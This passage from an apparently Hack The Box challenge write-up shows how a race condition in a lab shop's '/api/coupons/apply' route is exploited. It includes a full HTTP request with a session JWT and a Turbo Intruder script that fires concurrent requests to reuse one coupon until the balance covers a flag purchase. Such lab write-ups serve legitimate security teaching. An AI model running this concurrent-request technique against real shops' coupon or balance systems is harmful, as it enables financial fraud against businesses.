punctuation">}</span></span></code></pre></div> <p>The response returned <code class="language-text">"Insufficient balance!"</code>, which was expected, but it also returned a session cookie in the form of a JWT. I took that JWT and used Turbo Intruder to send a request to the <code class="language-text">/api/coupons/apply</code> route:</p> <div class="gatsby-highlight" data-language="http"><pre class="language-http"><code class="language-http"><span class="token request-line"><span class="token method property">POST</span> <span class="token request-target url">/api/coupons/apply</span> <span class="token http-version property">HTTP/1.1</span></span> <span class="token header"><span class="token header-name keyword">Host</span><span class="token punctuation">:</span> <span class="token header-value">144.126.236.158:30114</span></span> <span class="token header"><span class="token header-name keyword">User-Agent</span><span class="token punctuation">:</span> <span class="token header-value">Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0</span></span> <span class="token header"><span class="token header-name keyword">Accept</span><span class="token punctuation">:</span> <span class="token header-value">*/*</span></span> <span class="token header"><span class="token header-name keyword">Accept-Language</span><span class="token punctuation">:</span> <span class="token header-value">en-US,en;q=0.5</span></span> <span class="token header"><span class="token header-name keyword">Accept-Encoding</span><span class="token punctuation">:</span> <span class="token header-value">gzip, deflate</span></span> <span class="token header"><span class="token header-name keyword">Referer</span><span class="token punctuation">:</span> <span class="token header-value">http://144.126.236.158:30114/</span></span> <span class="token header"><span class="token header-name keyword">Content-Type</span><span class="token punctuation">:</span> <span class="token header-value">application/json</span></span> <span class="token header"><span class="token header-name keyword">Origin</span><span class="token punctuation">:</span> <span class="token header-value">http://144.126.236.158:30114</span></span> <span class="token header"><span class="token header-name keyword">Content-Length</span><span class="token punctuation">:</span> <span class="token header-value">25</span></span> <span class="token header"><span class="token header-name keyword">Cookie</span><span class="token punctuation">:</span> <span class="token header-value">session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InR5bGVyX2I2ODJiNzM3NzQiLCJpYXQiOjE2Nzk4OTM5OTN9.FduhLTUxPvMizyUhFvfOGZ9hl2ZagLqb9lFBep9kycE</span></span> <span class="token header"><span class="token header-name keyword">Connection</span><span class="token punctuation">:</span> <span class="token header-value">close</span></span> <span class="token application-json"> <span class="token punctuation">{</span> <span class="token property">"coupon_code"</span><span class="token operator">:</span><span class="token string">"%s"</span> <span class="token punctuation">}</span></span></code></pre></div> <p><code class="language-text">%s</code> is the placeholder for the payload of <code class="language-text">HTB_100</code> that will be sent as concurrent requests.</p> <p>Next, within the Turbo Intruder configuration, I used the <a href="https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/basic.py" target="_blank">basic.py</a> script:</p> <div class="gatsby-highlight" data-language="python"><pre class="language-python"><code class="language-python"><span class="token keyword">def</span> <span class="token function">queueRequests</span><span class="token punctuation">(</span>target<span class="token punctuation">,</span> wordlists<span class="token punctuation">)</span><span class="token punctuation">:</span> engine <span class="token operator">=</span> RequestEngine<span class="token punctuation">(</span>endpoint<span class="token operator">=</span>target<span class="token punctuation">.</span>endpoint<span class="token punctuation">,</span> concurrentConnections<span class="token operator">=</span><span class="token number">5</span><span class="token punctuation">,</span> requestsPerConnection<span class="token operator">=</span><span class="token number">100</span><span class="token punctuation">,</span> pipeline<span class="token operator">=</span><span class="token boolean">False</span> <span class="token punctuation">)</span> <span class="token keyword">for</span> i <span class="token keyword">in</span> <span class="token builtin">range</span><span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span> <span class="token number">8</span><span class="token punctuation">)</span><span class="token punctuation">:</span> engine<span class="token punctuation">.</span>queue<span class="token punctuation">(</span>target<span class="token punctuation">.</span>req<span class="token punctuation">,</span> randstr<span class="token punctuation">(</span>i<span class="token punctuation">)</span><span class="token punctuation">,</span> learn<span class="token operator">=</span><span class="token number">1</span><span class="token punctuation">)</span> engine<span class="token punctuation">.</span>queue<span class="token punctuation">(</span>target<span class="token punctuation">.</span>req<span class="token punctuation">,</span> target<span class="token punctuation">.</span>baseInput<span class="token punctuation">,</span> learn<span class="token operator">=</span><span class="token number">2</span><span class="token punctuation">)</span> <span class="token keyword">for</span> word <span class="token keyword">in</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'/home/kali/Desktop/HTB_100.txt'</span><span class="token punctuation">)</span><span class="token punctuation">:</span> engine<span class="token punctuation">.</span>queue<span class="token punctuation">(</span>target<span class="token punctuation">.</span>req<span class="token punctuation">,</span> word<span class="token punctuation">.</span>rstrip<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token keyword">def</span> <span class="token function">handleResponse</span><span class="token punctuation">(</span>req<span class="token punctuation">,</span> interesting<span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token keyword">if</span> interesting<span class="token punctuation">:</span> table<span class="token punctuation">.</span>add<span class="token punctuation">(</span>req<span class="token punctuation">)</span></code></pre></div> <p>The above script will make a specified number of concurrent connections and requests per connection to the endpoint of <code class="language-text">/api/coupons/apply</code>. Then, it will read from a wordlist and add a request for each word in the list, in this case the wordlist will contain several lines of <code class="language-text">HTB_100</code>. I suggest experimenting with the number of concurrent connections, requests per connection, and length of the wordlist containing <code class="language-text">HTB_100</code> to achieve the desired result.</p> <p>I ran the attack in Turbo Intruder and although there were some <code class="language-text">401</code> errors returned in the responses, many of them also got through with a <code class="language-text">200</code> response and successfully added to the user's balance.</p> <p>Next, I attempted to purchase the <code class="language-text">C8</code> item and the flag was returned in the response. This is because the concurrent requests were sent to the server to access a shared resource and compete for it in an uncontrolled manner which created a race condition and allowed the <code class="language-text">HTB_100</code> coupon to be applied multiple times, resulting in a continuous addition to the balance well over the required amount of $13.37 to purchase the <code class="language-text">C8</code> item.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4680e8811576260307f8b6d8ae80a1f8/ab031/flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.24050632911392%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsSAAALEgHS3X78AAABIklEQVR42o1R7W6DMBDL+z/jfnRrGQmEkIRAvnEv0EpbpU4zsgLCZ9/lmBwEck7EjH3f8QrtAv0rGAWHtRqllIO11kNf61lzERofXz3Y2HMMwwghBKSUSOk0b2yFPragikkMuH4KiEGSsUWMETEEeGKrCTEhpgzGybm7ScyzhlIK3vtD0AoynU9I6XC9KtxuPQYKn6YJM+mbruE5G+t7g66bwcUIzjkkCVt3r3Bug7EOy7pg8xvc5uCTJ6Pf18QE1+g7BUmGzmisNE6m1Erd1XY2UkDr2toAGxeihQkGyiss9O2zPxhLBDMdh7p8Y5MKWc9IM9EYhDYOvYd2rxRyLgFvsT8etmiHdXEotbwXH9us+A/Yum6PTcVjrHfc/2rvh+EdTwJveamclGUAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="flag" title="" src="/static/4680e8811576260307f8b6d8ae80a1f8/50637/flag.png" srcset="/static/4680e8811576260307f8b6d8ae80a1f8/dda05/flag.png 158w, /static/4680e8811576260307f8b6d8ae80a1f8/679a3/flag.png 315w, /static/4680e8811576260307f8b6d8ae80a1f8/50637/flag.png 630w, /static/4680e8811576260307f8b6d8ae80a1f8/fddb0/flag.png 945w, /static/4680e8811576260307f8b6d8ae80a1f8/ab031/flag.png 1019w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p>